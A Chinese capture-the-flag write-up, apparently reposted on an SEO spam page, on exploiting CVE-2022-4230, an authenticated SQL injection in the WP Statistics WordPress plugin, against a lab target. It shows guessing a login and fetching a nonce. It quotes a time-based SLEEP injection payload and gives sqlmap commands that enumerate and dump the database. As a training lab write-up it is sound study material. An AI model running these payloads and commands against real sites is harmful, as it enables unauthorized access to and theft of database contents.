当前位置: 首页 > news >正文

淄博网站建设优化运营熊掌号专业做网站公司

淄博网站建设优化运营熊掌号,专业做网站公司,轻极企业wordpress主题,怎么制作表格excel初学者视频目录 靶标介绍 开启靶场 wpscan漏洞介绍 查询数据库表名 查询表中字段名 查询字段下数据 靶标介绍 WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (ad…

目录

靶标介绍

开启靶场

wpscan漏洞介绍

查询数据库表名

查询表中字段名

查询字段下数据


靶标介绍

WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。

开启靶场

开启靶场之后,发现什么都没有,所以我们进行目录扫描,这里我使用的是御剑目录扫描工具

访问 license.txt 无收获,访问 resdme.html 发现以下页面

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/readme.html

点击 login page,发现了一个登录页面

试了用户名和密码是 admin 之后并无发现,左下角有一个“返回到 test”,说明 test 大概率是用户,尝试登录一下

发现登录成功了

wpscan漏洞介绍

根据靶标介绍,这里有插件漏洞,链接:WP Statistics < 13.2.9 – 经过身份验证的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com),有兴趣可以了解下

意思大概是这样的:以允许查看WP统计信息的用户身份登录,并通过获取随机数“https://xxx.com/wp-admin/admin-ajax.php?action=rest-nonce”,并在下面的URL中使用它,该URL将延迟5s

首先通过访问,获得随机数(必须要先登录过后台才行)

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce

获得随机数之后,把随机数添加到下面那个 URL 中,访问一下试试,这里就不加“%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR”了,不加这条语句不影响最终结果

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=16139d290f&name=words&search_engine=aaa

访问之后发现了这个页面,然后用 Burp 抓个包吧

把数据包复制到一个文本里,重命名为 test.txt 拖进 kali 桌面,在桌面打开终端使用 sqlmap 工具跑一下

sqlmap -r test.txt --batch --dbs

发现了 wordpress 敏感数据库

查询数据库表名

sqlmap -r test.txt --batch -D wordpress --tables

发现了一个 flag 表

查询表中字段名

sqlmap -r test.txt --batch -D wordpress -T flag --columns

发现字段名是 flag

查询字段下数据

sqlmap -r test.txt --batch -D wordpress -T flag -C flag --dump

发现了 flag

http://www.dinnco.com/news/5566.html

相关文章:

  • 打开上次浏览的网站网盘资源共享群吧
  • 网站仿做郑州抖音seo
  • 江苏港口建设费申报网站百度推广后台登录入口
  • 做网站需要注意哪些新手怎么做电商
  • 网站如何在百度上搜索到360推广官网
  • 网站登录不了营销必备十大软件
  • 佛山宽屏网站建设免费的网站域名查询565wcc
  • 重庆网站建设公司海口互联网金融
  • 做网站设计前景怎么样最新域名8xgmvxyz
  • 南京做网站建设的公司哪家好百度搜索热度查询
  • 荆州公司做网站百度seo排名优化联系方式
  • 响应式网站建设服务提供商网上推广平台有哪些
  • 回民区建设局网站互动营销案例100
  • 成都保洁公司某个网站seo分析实例
  • 郑州市东区建设环保局官方网站爱站关键词搜索
  • 扬州市建设厅网站刷粉网站推广便宜
  • 沈阳市官网信息流优化师是干什么的
  • 做教育的网站网络推广培训课程内容
  • 网站建设与管理计划书南宁seo内部优化
  • 做热血钓鱼网站竞价账户托管的公司有哪些
  • 武汉建设厅官网seo优化分析
  • 网站运营数据周报表怎么做百度地图人工客服电话
  • asp.net做购物网站黑龙江新闻头条最新消息
  • 宁波英文网站建设珠海百度关键字优化
  • 网站建设的概念郴州网站推广
  • 台州网站建设解决方案站长工具seo综合查询引流
  • 撤销网站备案表填写后网站建设的流程是什么
  • 西安淘宝网站建设公司全国疫情又严重了
  • 银行门户网站是什么意思长沙网站包年优化
  • 网站后台域名百度竞价返点一般多少